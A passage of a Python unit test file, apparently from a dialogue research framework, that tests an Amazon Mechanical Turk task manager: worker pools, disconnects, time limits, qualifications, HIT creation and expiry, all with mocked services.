self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_2.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_DONE)
self.assertTrue(manager._no_agents_incomplete(agents))
def test_world_types(self):
onboard_type = 'o_12345'
waiting_type = 'w_12345'
task_type = 't_12345'
garbage_type = 'g_12345'
manager = self.mturk_manager
self.assertTrue(manager.is_onboarding_world(onboard_type))
self.assertTrue(manager.is_task_world(task_type))
self.assertTrue(manager.is_waiting_world(waiting_type))
for world_type in [waiting_type, task_type, garbage_type]:
self.assertFalse(manager.is_onboarding_world(world_type))
for world_type in [onboard_type, task_type, garbage_type]:
self.assertFalse(manager.is_waiting_world(world_type))
for world_type in [waiting_type, onboard_type, garbage_type]:
self.assertFalse(manager.is_task_world(world_type))
def test_turk_timeout(self):
"""
Timeout should send expiration message to worker and be treated as a disconnect
event.
"""
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
manager._handle_agent_disconnect = mock.MagicMock()
manager.handle_turker_timeout(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
manager.force_expire_hit.assert_called_once()
call_args = manager.force_expire_hit.call_args
self.assertEqual(call_args[0][0], TEST_WORKER_ID_1)
self.assertEqual(call_args[0][1], TEST_ASSIGNMENT_ID_1)
manager._handle_agent_disconnect.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
@testing_utils.retry()
def test_wait_for_task_expirations(self):
"""
Ensure waiting for expiration time actually works out.
"""
manager = self.mturk_manager
manager.opt['assignment_duration_in_seconds'] = 0.5
manager.expire_all_unassigned_hits = mock.MagicMock()
manager.hit_id_list = [1, 2, 3]
def run_task_wait():
manager._wait_for_task_expirations()
wait_thread = threading.Thread(target=run_task_wait, daemon=True)
wait_thread.start()
time.sleep(0.1)
self.assertTrue(wait_thread.isAlive())
assert_equal_by(wait_thread.isAlive, False, 0.6)
def test_mark_workers_done(self):
manager = self.mturk_manager
manager.give_worker_qualification = mock.MagicMock()
manager._log_working_time = mock.MagicMock()
manager.has_time_limit = False
# Assert finality doesn't change
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
manager.mark_workers_done([self.agent_1])
self.assertEqual(AssignState.STATUS_DISCONNECT, self.agent_1.get_status())
# assert uniqueness works as expected
manager.is_unique = True
with self.assertRaises(AssertionError):
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_not_called()
manager.unique_qual_name = 'fake_qual_name'
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_called_once_with(
self.agent_2.worker_id, 'fake_qual_name'
)
self.assertEqual(self.agent_2.get_status(), AssignState.STATUS_DONE)
manager.is_unique = False
# Ensure working time is called if it's set
manager.has_time_limit = True
manager.mark_workers_done([self.agent_3])
self.assertEqual(self.agent_3.get_status(), AssignState.STATUS_DONE)
manager._log_working_time.assert_called_once_with(self.agent_3)
class TestMTurkManagerPoolHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_pool_add_get_remove_and_expire(self):
"""
Ensure the pool properly adds and releases workers.
"""
all_are_eligible = {'multiple': True, 'func': lambda workers: workers}
manager = self.mturk_manager
# Test empty pool
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test pool add and get
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
manager._add_agent_to_pool(self.agent_3)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test extra add to pool has no effect
manager._add_agent_to_pool(self.agent_1)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test remove from the pool works:
manager._remove_from_agent_pool(self.agent_2)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible), [self.agent_1, self.agent_3]
)
# Test repeated remove fails
with self.assertRaises(AssertionError):
manager._remove_from_agent_pool(self.agent_2)
# Test eligibility function
second_worker_only = {'multiple': True, 'func': lambda workers: [workers[1]]}
self.assertListEqual(
manager._get_unique_pool(second_worker_only), [self.agent_3]
)
# Test single eligibility function
only_agent_1 = {
'multiple': False,
'func': lambda worker: worker is self.agent_1,
}
self.assertListEqual(manager._get_unique_pool(only_agent_1), [self.agent_1])
# Test expiration of pool
manager.force_expire_hit = mock.MagicMock()
manager._expire_agent_pool()
manager.force_expire_hit.assert_any_call(
self.agent_1.worker_id, self.agent_1.assignment_id
)
manager.force_expire_hit.assert_any_call(
self.agent_3.worker_id, self.agent_3.assignment_id
)
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test adding two agents from the same worker
self.agent_2.worker_id = self.agent_1.worker_id
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
# both workers are in the pool
self.assertListEqual(manager.agent_pool, [self.agent_1, self.agent_2])
# Only one worker per unique list though
manager.is_sandbox = False
self.assertListEqual(manager._get_unique_pool(all_are_eligible), [self.agent_1])
class TestMTurkManagerTimeHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager.time_limit_checked = time.time()
self.mturk_manager.worker_manager.un_time_block_workers = mock.MagicMock()
self.mturk_manager.worker_manager.time_block_worker = mock.MagicMock()
self.old_time = MTurkManagerFile.time
MTurkManagerFile.time = mock.MagicMock()
MTurkManagerFile.time.time = mock.MagicMock(return_value=0)
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
def tearDown(self):
self.mturk_manager.shutdown()
MTurkManagerFile.time = self.old_time
def test_create_work_time_file(self):
manager = self.mturk_manager
manager._should_use_time_logs = mock.MagicMock(return_value=True)
file_path = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_LOCK)
# No lock should exist already
self.assertFalse(os.path.exists(file_lock))
# open the work time file, ensure it was just updated
MTurkManagerFile.time.time = mock.MagicMock(return_value=42424242)
manager._reset_time_logs(force=True)
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
self.assertEqual(existing_times['last_reset'], 42424242)
self.assertEqual(len(existing_times), 1)
# Try to induce a check, ensure it doesn't fire because too recent
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Try to induce a check, ensure it doesn't fire because outside of 30
# minute window
MTurkManagerFile.time.time = mock.MagicMock(
return_value=(60 * 60 * 24 * 1000) + (60 * 40)
)
manager.time_limit_checked = 0
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Induce a check
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
self.assertEqual(manager.time_limit_checked, (60 * 60 * 24 * 1000))
def test_add_to_work_time_file_and_block(self):
manager = self.mturk_manager
self.agent_1.creation_time = 1000
self.agent_2.creation_time = 1000
manager.opt['max_time'] = 10000
# Ensure a worker below the time limit isn't blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=10000)
self.mturk_manager._should_use_time_logs = mock.MagicMock(return_value=True)
manager._log_working_time(self.agent_1)
manager.worker_manager.time_block_worker.assert_not_called()
# Ensure a worker above the time limit is blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=100000)
manager._log_working_time(self.agent_2)
manager.worker_manager.time_block_worker.assert_called_with(
self.agent_2.worker_id
)
# Ensure on a (forced) reset all workers are freed
manager._reset_time_logs(force=True)
manager.worker_manager.un_time_block_workers.assert_called_once()
args = manager.worker_manager.un_time_block_workers.call_args
worker_list = args[0][0]
self.assertIn(self.agent_1.worker_id, worker_list)
self.assertIn(self.agent_2.worker_id, worker_list)
class TestMTurkManagerLifecycleFunctions(unittest.TestCase):
def setUp(self):
self.fake_socket = MockSocket()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['task_description'] = 'Test task description'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
MTurkManagerFile.server_utils.delete_server = mock.MagicMock()
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
@testing_utils.retry()
def test_full_lifecycle(self):
manager = self.mturk_manager
server_url = 'https://fake_server_url'
topic_arn = 'aws_topic_arn'
mturk_page_url = 'https://test_mturk_page_url'
MTurkManagerFile.server_utils.setup_server = mock.MagicMock(
return_value=server_url
)
MTurkManagerFile.server_utils.setup_legacy_server = mock.MagicMock(
return_value=server_url
)
# Currently in state created. Try steps that are too soon to work
with self.assertRaises(AssertionError):
manager.start_new_run()
with self.assertRaises(AssertionError):
manager.start_task(None, None, None)
# Setup the server but fail due to insufficent funds
manager.opt['local'] = True
MTurkManagerFile.input = mock.MagicMock()
MTurkManagerFile.mturk_utils.setup_aws_credentials = mock.MagicMock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=False
)
MTurkManagerFile.mturk_utils.calculate_mturk_cost = mock.MagicMock(
return_value=10
)
with self.assertRaises(SystemExit):
manager.setup_server()
MTurkManagerFile.mturk_utils.setup_aws_credentials.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.input.assert_called()
# Two calls to to input if local is set
self.assertEqual(len(MTurkManagerFile.input.call_args_list), 2)
# Test successful setup
manager.opt['local'] = False
MTurkManagerFile.input.reset_mock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=True
)
MTurkManagerFile.mturk_utils.create_hit_config = mock.MagicMock()
manager.setup_server()
# Copy one file for cover page, 2 workers, and 1 onboarding
self.assertEqual(len(manager.task_files_to_copy), 4)
self.assertEqual(manager.server_url, server_url)
self.assertIn('unittest', manager.server_task_name)
MTurkManagerFile.input.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.mturk_utils.create_hit_config.assert_called_once()
self.assertEqual(manager.task_state, manager.STATE_SERVER_ALIVE)
# Start a new run
MTurkManagerFile.mturk_utils.setup_sns_topic = mock.MagicMock(
return_value=topic_arn
)
manager._init_state = mock.MagicMock(wraps=manager._init_state)
manager.start_new_run()
manager._init_state.assert_called_once()
MTurkManagerFile.mturk_utils.setup_sns_topic.assert_called_once_with(
manager.opt['task'], manager.server_url, manager.task_group_id
)
self.assertEqual(manager.topic_arn, topic_arn)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
# connect to the server
manager._setup_socket = mock.MagicMock()
manager.ready_to_accept_workers()
manager._setup_socket.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_ACCEPTING_WORKERS)
# 'launch' some hits
manager.create_additional_hits = mock.MagicMock(return_value=mturk_page_url)
hits_url = manager.create_hits()
manager.create_additional_hits.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_HITS_MADE)
self.assertEqual(hits_url, mturk_page_url)
# start a task
manager.num_conversations = 10
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
# Run a task, ensure it closes when the max convs have been 'had'
def run_task():
manager.start_task(lambda worker: True, None, None)
task_thread = threading.Thread(target=run_task, daemon=True)
task_thread.start()
self.assertTrue(task_thread.isAlive())
manager.started_conversations = 10
manager.completed_conversations = 10
assert_equal_by(task_thread.isAlive, False, 0.6)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
# shutdown
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
manager._wait_for_task_expirations = mock.MagicMock()
MTurkManagerFile.mturk_utils.delete_sns_topic = mock.MagicMock()
manager.shutdown()
self.assertTrue(manager.is_shutdown)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
manager._wait_for_task_expirations.assert_called_once()
MTurkManagerFile.server_utils.delete_server.assert_called_once()
MTurkManagerFile.mturk_utils.delete_sns_topic.assert_called_once_with(topic_arn)
class TestMTurkManagerConnectedFunctions(unittest.TestCase):
"""
Semi-unit semi-integration tests on the more state-dependent MTurkManager
functionality.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager._onboard_new_agent = mock.MagicMock()
self.mturk_manager._wait_for_task_expirations = mock.MagicMock()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_ACCEPTING_WORKERS
self.mturk_manager._setup_socket()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_2,
'hit_id': TEST_HIT_ID_2,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
self.agent_1 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_1
)
self.agent_2 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_2
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_socket_dead(self):
"""
Test all states of socket dead calls.
"""
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
manager.socket_manager.close_channel = mock.MagicMock()
agent.reduce_state = mock.MagicMock()
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._handle_agent_disconnect = mock.MagicMock(
wraps=manager._handle_agent_disconnect
)
# Test status none
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
manager._handle_agent_disconnect.assert_not_called()
# Test status onboarding
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
self.assertFalse(agent.disconnected)
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
# test status waiting
agent.disconnected = False
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
manager._remove_from_agent_pool.assert_called_once_with(agent)
# test status in task
agent.disconnected = False
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_called_once_with(
worker_id, assignment_id
)
# test status done
agent.disconnected = False
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager._handle_agent_disconnect.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertNotEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
self.assertFalse(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
def test_send_message_command(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = self.agent_1.worker_id
assignment_id = self.agent_1.assignment_id
agent.set_last_command = mock.MagicMock()
manager.socket_manager.queue_packet = mock.MagicMock()
# Send a command
data = {'text': data_model.COMMAND_SEND_MESSAGE}
manager.send_command(worker_id, assignment_id, data)
agent.set_last_command.assert_called_once_with(data)
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertEqual(packet.data, data)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_COMMAND)
# Send a message
data = {'text': 'This is a test message'}
agent.set_last_command.reset_mock()
manager.socket_manager.queue_packet.reset_mock()
message_id = manager.send_message(worker_id, assignment_id, data)
agent.set_last_command.assert_not_called()
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertNotEqual(packet.data, data)
self.assertEqual(data['text'], packet.data['text'])
self.assertEqual(packet.data['message_id'], message_id)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_MESSAGE)
def test_free_workers(self):
manager = self.mturk_manager
manager.socket_manager.close_channel = mock.MagicMock()
manager.free_workers([self.agent_1])
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
def test_force_expire_hit(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
socket_manager = manager.socket_manager
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
# Test expiring finished worker
agent.set_status(AssignState.STATUS_DONE)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_not_called()
socket_manager.close_channel.assert_not_called()
self.assertEqual(agent.get_status(), AssignState.STATUS_DONE)
# Test expiring not finished worker with default args
agent.set_status(AssignState.STATUS_ONBOARDING)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
self.assertTrue(agent.hit_is_expired)
self.assertIsNotNone(data['inactive_text'])
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
# Test expiring not finished worker with custom arguments
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.hit_is_expired = False
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
special_disconnect_text = 'You were disconnected as part of a test'
test_ack_function = mock.MagicMock()
manager.force_expire_hit(
worker_id,
assignment_id,
text=special_disconnect_text,
ack_func=test_ack_function,
)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
self.assertTrue(agent.hit_is_expired)
self.assertEqual(data['inactive_text'], special_disconnect_text)
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
test_ack_function.assert_called()
def test_get_qualifications(self):
manager = self.mturk_manager
mturk_utils = MTurkManagerFile.mturk_utils
mturk_utils.find_or_create_qualification = mock.MagicMock()
# create a qualification list with nothing but a provided junk qual
fake_qual = {
'QualificationTypeId': 'fake_qual_id',
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept',
}
qualifications = manager.get_qualification_list([fake_qual])
self.assertListEqual(qualifications, [fake_qual])
self.assertListEqual(manager.qualifications, [fake_qual])
mturk_utils.find_or_create_qualification.assert_not_called()
# Create a qualificaiton list using all the default types
disconnect_qual_name = 'disconnect_qual_name'
disconnect_qual_id = 'disconnect_qual_id'
block_qual_name = 'block_qual_name'
block_qual_id = 'block_qual_id'
max_time_qual_name = 'max_time_qual_name'
max_time_qual_id = 'max_time_qual_id'
unique_qual_name = 'unique_qual_name'
unique_qual_id = 'unique_qual_id'
def return_qualifications(qual_name, _text, _sb):
if qual_name == disconnect_qual_name:
return disconnect_qual_id
if qual_name == block_qual_name:
return block_qual_id
if qual_name == max_time_qual_name:
return max_time_qual_id
if qual_name == unique_qual_name:
return unique_qual_id
mturk_utils.find_or_create_qualification = return_qualifications
manager.opt['disconnect_qualification'] = disconnect_qual_name
manager.opt['block_qualification'] = block_qual_name
manager.opt['max_time_qual'] = max_time_qual_name
manager.opt['unique_qual_name'] = unique_qual_name
manager.is_unique = True
manager.has_time_limit = True
manager.qualifications = None
qualifications = manager.get_qualification_list()
for qual in qualifications:
self.assertEqual(qual['ActionsGuarded'], 'DiscoverPreviewAndAccept')
self.assertEqual(qual['Comparator'], 'DoesNotExist')
for qual_id in [
disconnect_qual_id,
block_qual_id,
max_time_qual_id,
unique_qual_id,
]:
has_qual = False
for qual in qualifications:
if qual['QualificationTypeId'] == qual_id:
has_qual = True
break
self.assertTrue(has_qual)
self.assertListEqual(qualifications, manager.qualifications)
def test_create_additional_hits(self):
manager = self.mturk_manager
manager.opt['hit_title'] = 'test_hit_title'
manager.opt['hit_description'] = 'test_hit_description'
manager.opt['hit_keywords'] = 'test_hit_keywords'
manager.opt['reward'] = 0.1
mturk_utils = MTurkManagerFile.mturk_utils
fake_hit = 'fake_hit_type'
mturk_utils.create_hit_type = mock.MagicMock(return_value=fake_hit)
mturk_utils.subscribe_to_hits = mock.MagicMock()
mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=('page_url', 'hit_id', 'test_hit_response')
)
manager.server_url = 'test_url'
manager.task_group_id = 'task_group_id'
manager.topic_arn = 'topic_arn'
mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
manager.server_url, manager.task_group_id
)
hit_url = manager.create_additional_hits(5)
mturk_utils.create_hit_type.assert_called_once()
mturk_utils.subscribe_to_hits.assert_called_with(
fake_hit, manager.is_sandbox, manager.topic_arn
)
self.assertEqual(len(mturk_utils.create_hit_with_hit_type.call_args_list), 5)
mturk_utils.create_hit_with_hit_type.assert_called_with(
opt=manager.opt,
page_url=mturk_chat_url,
hit_type_id=fake_hit,
num_assignments=1,
is_sandbox=manager.is_sandbox,
)
self.assertEqual(len(manager.hit_id_list), 5)
self.assertEqual(hit_url, 'page_url')
def test_expire_all_hits(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
completed_hit_id = 'completed'
incomplete_1 = 'incomplete_1'
incomplete_2 = 'incomplete_2'
MTurkManagerFile.mturk_utils.expire_hit = mock.MagicMock()
worker_manager.get_complete_hits = mock.MagicMock(
return_value=[completed_hit_id]
)
manager.hit_id_list = [completed_hit_id, incomplete_1, incomplete_2]
manager.expire_all_unassigned_hits()
worker_manager.get_complete_hits.assert_called_once()
expire_calls = MTurkManagerFile.mturk_utils.expire_hit.call_args_list
self.assertEqual(len(expire_calls), 2)
for hit in [incomplete_1, incomplete_2]:
found = False
for expire_call in expire_calls:
if expire_call[0][1] == hit:
found = True
break
self.assertTrue(found)
def test_qualification_management(self):
manager = self.mturk_manager
test_qual_name = 'test_qual'
other_qual_name = 'other_qual'
test_qual_id = 'test_qual_id'
worker_id = self.agent_1.worker_id
mturk_utils = MTurkManagerFile.mturk_utils
success_id = 'Success'
def find_qualification(qual_name, _sandbox):
if qual_name == test_qual_name:
return test_qual_id
return None
mturk_utils.find_qualification = find_qualification
mturk_utils.give_worker_qualification = mock.MagicMock()
mturk_utils.remove_worker_qualification = mock.MagicMock()
mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=success_id
)
# Test give qualification
manager.give_worker_qualification(worker_id, test_qual_name)
mturk_utils.give_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, None, manager.is_sandbox
)
# Test revoke qualification
manager.remove_worker_qualification(worker_id, test_qual_name)
mturk_utils.remove_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, manager.is_sandbox, ''
)
# Test create qualification can exist
result = manager.create_qualification(test_qual_name, '')
self.assertEqual(result, success_id)
# Test create qualification can't exist failure
result = manager.create_qualification(test_qual_name, '', False)
self.assertIsNone(result)
# Test create qualification can't exist success
result = manager.create_qualification(other_qual_name, '')
self.assertEqual(result, success_id)
def test_partner_disconnect(self):
manager = self.mturk_manager
manager.send_command = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_IN_TASK)
manager._handle_partner_disconnect(self.agent_1)
self.assertEqual(
self.agent_1.get_status(), AssignState.STATUS_PARTNER_DISCONNECT
)
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, self.agent_1.worker_id)
self.assertEqual(assignment_id, self.agent_1.assignment_id)
self.assertDictEqual(data, self.agent_1.get_inactive_command_data())
@testing_utils.retry()
def test_restore_state(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
worker_manager.change_agent_conversation = mock.MagicMock()
manager.send_command = mock.MagicMock()
agent = self.agent_1
agent.conversation_id = 'Test_conv_id'
agent.id = 'test_agent_id'
agent.request_message = mock.MagicMock()
agent.message_request_time = time.time()
test_message = {
'text': 'this_is_a_message',
'message_id': 'test_id',
'type': data_model.MESSAGE_TYPE_MESSAGE,
}
agent.append_message(test_message)
manager._restore_agent_state(agent.worker_id, agent.assignment_id)
self.assertFalse(agent.alived)
manager.send_command.assert_not_called()
worker_manager.change_agent_conversation.assert_called_once_with(
agent=agent, conversation_id=agent.conversation_id, new_agent_id=agent.id
)
agent.alived = True
assert_equal_by(lambda: len(agent.request_message.call_args_list), 1, 0.6)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, agent.worker_id)
self.assertEqual(assignment_id, agent.assignment_id)
self.assertListEqual(data['messages'], agent.get_messages())
self.assertEqual(data['text'], data_model.COMMAND_RESTORE_STATE)
def test_expire_onboarding(self):
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
